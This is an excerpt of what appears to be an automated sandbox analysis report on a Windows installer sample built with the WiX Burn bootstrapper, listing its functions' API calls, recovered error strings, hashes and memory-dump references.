                                                                                                                                                                                                                                                                                                  • Instruction ID: e8f4cd1fc62edb61e421711e0e36c625b41dd54dbca652fc08477e903e86715e
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 97920cd2f7c6111961ee096ee9626386821529b75969310a8721c25885c4f4fd
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5B515B35905219EFEB15DBA4CC44EAEBBB8FF05311F1442A9E511EB6A0EB319E10EB50
                                                                                                                                                                                                                                                                                                  Function 008A84C7 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 156COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: GetProcessHeap.KERNEL32(?,000001C7,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863960
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: RtlAllocateHeap.NTDLL(00000000,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863967
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000010,00000001,00000000,00000000,00000410,?,?,00889063,000002C0,00000100), ref: 008A84F5
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,application,000000FF,?,?,00889063,000002C0,00000100,000002C0,000002C0,00000100,000002C0,00000410), ref: 008A8510
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CompareHeapString$AllocateProcess
                                                                                                                                                                                                                                                                                                  • String ID: application$apuputil.cpp$http://appsyndication.org/2006/appsyn$type
                                                                                                                                                                                                                                                                                                  • API String ID: 2664528157-4206478990
                                                                                                                                                                                                                                                                                                  • Opcode ID: 8fef95ce4effde69ab4bccd8a2ff096ffcbacbe577d3b0432750f7b2113d683b
                                                                                                                                                                                                                                                                                                  • Instruction ID: c860b54599d836fc1684d9c1d7afb02722ef8030f993a39369a9139fbeff5305
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8fef95ce4effde69ab4bccd8a2ff096ffcbacbe577d3b0432750f7b2113d683b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F551C471A44601EFFB209F18CC85F1A7BA5FB12720F208518F965EB6D1DB70ED408B61
                                                                                                                                                                                                                                                                                                  Function 008A64B7 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 154fileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 008A6513
                                                                                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(00000410,00000000,00000000,?,?,00000078,000000FF,00000410,?,?,?,00000078,000000FF,?,?,00000078), ref: 008A660A
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF,00000000,00000000,?,?,00000078,000000FF,00000410,?,?,?,00000078,000000FF,?,?,00000078), ref: 008A6619
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseDeleteErrorFileHandleLast
                                                                                                                                                                                                                                                                                                  • String ID: Burn$DownloadTimeout$WiX\Burn$dlutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3522763407-1704223933
                                                                                                                                                                                                                                                                                                  • Opcode ID: 5c56b312007dd5c8dcfbd354fc0241ca4af0991248210e2653557273881fb158
                                                                                                                                                                                                                                                                                                  • Instruction ID: ac871857e322d334625e74bfd1450fa77bc23ecd4e3353c0e078f31034ff9f5d
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5c56b312007dd5c8dcfbd354fc0241ca4af0991248210e2653557273881fb158
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B512772D00229BBEF12DFA48C45EEEBBB9FF09710F044165FA14E6150E7359A219BA1
                                                                                                                                                                                                                                                                                                  Function 00869EC7 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 147COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 00869EED
                                                                                                                                                                                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 00869F12
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to format component id string., xrefs: 00869EF8
                                                                                                                                                                                                                                                                                                  • Failed to set variable., xrefs: 00869FF6
                                                                                                                                                                                                                                                                                                  • Failed to get component path: %d, xrefs: 00869F76
                                                                                                                                                                                                                                                                                                  • MsiComponentSearch failed: ID '%ls', HRESULT 0x%x, xrefs: 0086A006
                                                                                                                                                                                                                                                                                                  • Failed to format product code string., xrefs: 00869F1D
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Open@16
                                                                                                                                                                                                                                                                                                  • String ID: Failed to format component id string.$Failed to format product code string.$Failed to get component path: %d$Failed to set variable.$MsiComponentSearch failed: ID '%ls', HRESULT 0x%x
                                                                                                                                                                                                                                                                                                  • API String ID: 3613110473-1671347822
                                                                                                                                                                                                                                                                                                  • Opcode ID: 0c071035376daeb7f6ec767630181532ffdb989fac3a0293a9cf3f3af9e5f175
                                                                                                                                                                                                                                                                                                  • Instruction ID: db013c5e0e62e0ddf1614a1c422ff4009402a35367d80d43af0f39cdbb80a3f7
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0c071035376daeb7f6ec767630181532ffdb989fac3a0293a9cf3f3af9e5f175
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5041CE32900119FADF25AAACCC86EAEB76CFB05320F274612F555E61D1DB319A40DB92
                                                                                                                                                                                                                                                                                                  Function 0086F812 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 117registryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 0086F942
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 0086F94F
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • %ls.RebootRequired, xrefs: 0086F82F
                                                                                                                                                                                                                                                                                                  • Resume, xrefs: 0086F8B6
                                                                                                                                                                                                                                                                                                  • Failed to read Resume value., xrefs: 0086F8D8
                                                                                                                                                                                                                                                                                                  • Failed to format pending restart registry key to read., xrefs: 0086F846
                                                                                                                                                                                                                                                                                                  • Failed to open registration key., xrefs: 0086F8AB
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Close
                                                                                                                                                                                                                                                                                                  • String ID: %ls.RebootRequired$Failed to format pending restart registry key to read.$Failed to open registration key.$Failed to read Resume value.$Resume
                                                                                                                                                                                                                                                                                                  • API String ID: 3535843008-3890505273
                                                                                                                                                                                                                                                                                                  • Opcode ID: 60af4fec3c9ee3b161f291c5896495ce062d473c78889e598e0946e5d16f1fff
                                                                                                                                                                                                                                                                                                  • Instruction ID: fbca5b09c5150265b0166ad8559021c3aa5ea193254e34f42bd3ced623cd1828
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 60af4fec3c9ee3b161f291c5896495ce062d473c78889e598e0946e5d16f1fff
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 17415B72900119FFDF129FA8E881AADBBA4FB01314F564176EA10EB352C376DE419F81
                                                                                                                                                                                                                                                                                                  Function 0087AA00 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 111COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID: Failed to determine length of relative path.$Failed to determine length of source path.$Failed to set last source.$Failed to trim source folder.$WixBundleLastUsedSource
                                                                                                                                                                                                                                                                                                  • API String ID: 0-660234312
                                                                                                                                                                                                                                                                                                  • Opcode ID: 65ef62972558d8f6387adefc51e3d29c0e6d142d0b14ea8306c68319100ab6fe
                                                                                                                                                                                                                                                                                                  • Instruction ID: 28af976d95505248f2c8ad290a357a5e007d2e5194535fb11d9a2a3d3af5b095
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 65ef62972558d8f6387adefc51e3d29c0e6d142d0b14ea8306c68319100ab6fe
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0531D632900129BBCF269A98CC45E9EBB7AFB81720F118251F924F62D5EB71DE40C791
                                                                                                                                                                                                                                                                                                  Function 0088D8B0 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 106comCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CoCreateInstance.OLE32(008C0C4C,00000000,00000017,008C0C5C,?,?,00000000,00000000,?,?,?,?,?,0088DEE7,00000000,00000000), ref: 0088D8E8
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • WixBurn, xrefs: 0088D913
                                                                                                                                                                                                                                                                                                  • Failed to create IBackgroundCopyManager., xrefs: 0088D8F4
                                                                                                                                                                                                                                                                                                  • Failed to set progress timeout., xrefs: 0088D952
                                                                                                                                                                                                                                                                                                  • Failed to set BITS job to foreground., xrefs: 0088D969
                                                                                                                                                                                                                                                                                                  • Failed to set notification flags for BITS job., xrefs: 0088D93A
                                                                                                                                                                                                                                                                                                  • Failed to create BITS job., xrefs: 0088D922
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CreateInstance
                                                                                                                                                                                                                                                                                                  • String ID: Failed to create BITS job.$Failed to create IBackgroundCopyManager.$Failed to set BITS job to foreground.$Failed to set notification flags for BITS job.$Failed to set progress timeout.$WixBurn
                                                                                                                                                                                                                                                                                                  • API String ID: 542301482-468763447
                                                                                                                                                                                                                                                                                                  • Opcode ID: 376e26adbc5fa9d4df2a2bbf1fffb7324c99a33361fe1abdbf5ec0f2bea9db83
                                                                                                                                                                                                                                                                                                  • Instruction ID: c423df17a3905d4a05a5829b4f9fd7da9c7d5755b0ede5e7d30cbf1082b88836
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 376e26adbc5fa9d4df2a2bbf1fffb7324c99a33361fe1abdbf5ec0f2bea9db83
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 58314171A4031AEF9B15EBA9C885E7FBBF4FF48710B104169E915EB390DA34DC058B91
                                                                                                                                                                                                                                                                                                  Function 008A5DAE Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 100fileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,C0000000,00000004,00000000,00000004,00000080,00000000,00000000,?,?,?,?,?,WiX\Burn,DownloadTimeout,00000078), ref: 008A5DF8
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 008A5E05
                                                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,00000008,00000008,?,00000000), ref: 008A5E4C
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 008A5E80
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,dlutil.cpp,000000C8,00000000), ref: 008A5EB4
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorFileLast$CloseCreateHandleRead
                                                                                                                                                                                                                                                                                                  • String ID: %ls.R$dlutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3160720760-657863730
                                                                                                                                                                                                                                                                                                  • Opcode ID: 719f48372d50d37b436bf56093e1784b184d4f77273fd3a57bd6b3af0bfcadae
                                                                                                                                                                                                                                                                                                  • Instruction ID: 2c08030cc1e848250a8c1fdee08eb8ab691a09f99a6f2b9d24b59b34e57d5711
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 719f48372d50d37b436bf56093e1784b184d4f77273fd3a57bd6b3af0bfcadae
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B631E972941625BBF7208B64CC45B6E7BA4FF02731F114215FE11EB6C1E7709E5086E1
                                                                                                                                                                                                                                                                                                  Function 0086C8E6 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 98fileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086CD5E: CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,0086E444,000000FF,00000000,00000000,0086E444,?,?,0086DBEB,?,?,?,?), ref: 0086CD89
                                                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(E9008ABA,80000000,00000005,00000000,00000003,08000000,00000000,008653C5,?,00000000,840F01E8,14680A79,00000001,008653BD,00000000,00865489), ref: 0086C956
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00877809,0086566D,00865479,00865479,00000000,?,00865489,FFF9E89D,00865489,008654BD,00865445,?,00865445), ref: 0086C99B
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to get catalog local file path, xrefs: 0086C9D9
                                                                                                                                                                                                                                                                                                  • catalog.cpp, xrefs: 0086C9BC
                                                                                                                                                                                                                                                                                                  • Failed to verify catalog signature: %ls, xrefs: 0086C994
                                                                                                                                                                                                                                                                                                  • Failed to find payload for catalog file., xrefs: 0086C9E0
                                                                                                                                                                                                                                                                                                  • Failed to open catalog in working path: %ls, xrefs: 0086C9C9
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CompareCreateErrorFileLastString
                                                                                                                                                                                                                                                                                                  • String ID: Failed to find payload for catalog file.$Failed to get catalog local file path$Failed to open catalog in working path: %ls$Failed to verify catalog signature: %ls$catalog.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1774366664-48089280
                                                                                                                                                                                                                                                                                                  • Opcode ID: e08439d42f7407bea8880916c360b2420f9895ca14c5d05c8e0b54d54fad4c02
                                                                                                                                                                                                                                                                                                  • Instruction ID: 08911cc9da878d5d3b925d965f77717aa80c750e37eb83148ddaadff72e83b4b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e08439d42f7407bea8880916c360b2420f9895ca14c5d05c8e0b54d54fad4c02
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1431D532900625BBD7219F58CC42F6ABFA4FF05720F128165BA54EB241E671AD109BD1
                                                                                                                                                                                                                                                                                                  Function 0088D33E Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 92synchronizationCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,771B30B0,00000000,?,?,?,?,0088D642,?), ref: 0088D357
                                                                                                                                                                                                                                                                                                  • ReleaseMutex.KERNEL32(?,?,?,?,0088D642,?), ref: 0088D375
                                                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0088D3B6
                                                                                                                                                                                                                                                                                                  • ReleaseMutex.KERNEL32(?), ref: 0088D3CD
                                                                                                                                                                                                                                                                                                  • SetEvent.KERNEL32(?), ref: 0088D3D6
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to get message from netfx chainer., xrefs: 0088D3F7
                                                                                                                                                                                                                                                                                                  • Failed to send files in use message from netfx chainer., xrefs: 0088D41C
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: MutexObjectReleaseSingleWait$Event
                                                                                                                                                                                                                                                                                                  • String ID: Failed to get message from netfx chainer.$Failed to send files in use message from netfx chainer.
                                                                                                                                                                                                                                                                                                  • API String ID: 2608678126-3424578679
                                                                                                                                                                                                                                                                                                  • Opcode ID: 776d25d8c22dec9e520f1e0e5a46819f5cff03ca3b6aa127fb5a3ef5fa980cf4
                                                                                                                                                                                                                                                                                                  • Instruction ID: a7ce1d63adfc4a4b281c6be04c95638f44d50ab31a349d7ef9b31e68c13c105d
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 776d25d8c22dec9e520f1e0e5a46819f5cff03ca3b6aa127fb5a3ef5fa980cf4
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6331D731900719FFDB129F98DC08EAEBBF4FF45320F108255F965E22A1C73099109B91
                                                                                                                                                                                                                                                                                                  Function 008A093B Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 92processCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateProcessW.KERNEL32(00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,00000000), ref: 008A09AB
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 008A09B5
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,00000000,00000000,00000000), ref: 008A09FE
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,00000000,00000000), ref: 008A0A0B
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseHandle$CreateErrorLastProcess
                                                                                                                                                                                                                                                                                                  • String ID: "%ls" %ls$D$procutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 161867955-2732225242
                                                                                                                                                                                                                                                                                                  • Opcode ID: 26e348306cbbbb58219dba0aaf4c305ed21d3b0f6266d8e27ed2f45a0cf6dded
                                                                                                                                                                                                                                                                                                  • Instruction ID: 04535446d29d17ff8bb9137c467dc38059b97f9871357d0f6903011611f297b1
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 26e348306cbbbb58219dba0aaf4c305ed21d3b0f6266d8e27ed2f45a0cf6dded
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ED214D72D0121EABEB11DFE9CD41AAFBBB8FF05710F140025EA04F7612E7709E108AA1
                                                                                                                                                                                                                                                                                                  Function 00869B9A Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 75COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 00869BB3
                                                                                                                                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,00000000,?,0086A8AB,00000100,000002C0,000002C0,00000100), ref: 00869BD3
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0086A8AB,00000100,000002C0,000002C0,00000100), ref: 00869BDE
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to format variable string., xrefs: 00869BBE
                                                                                                                                                                                                                                                                                                  • Directory search: %ls, did not find path: %ls, reason: 0x%x, xrefs: 00869C4A
                                                                                                                                                                                                                                                                                                  • Failed to set directory search path variable., xrefs: 00869C0F
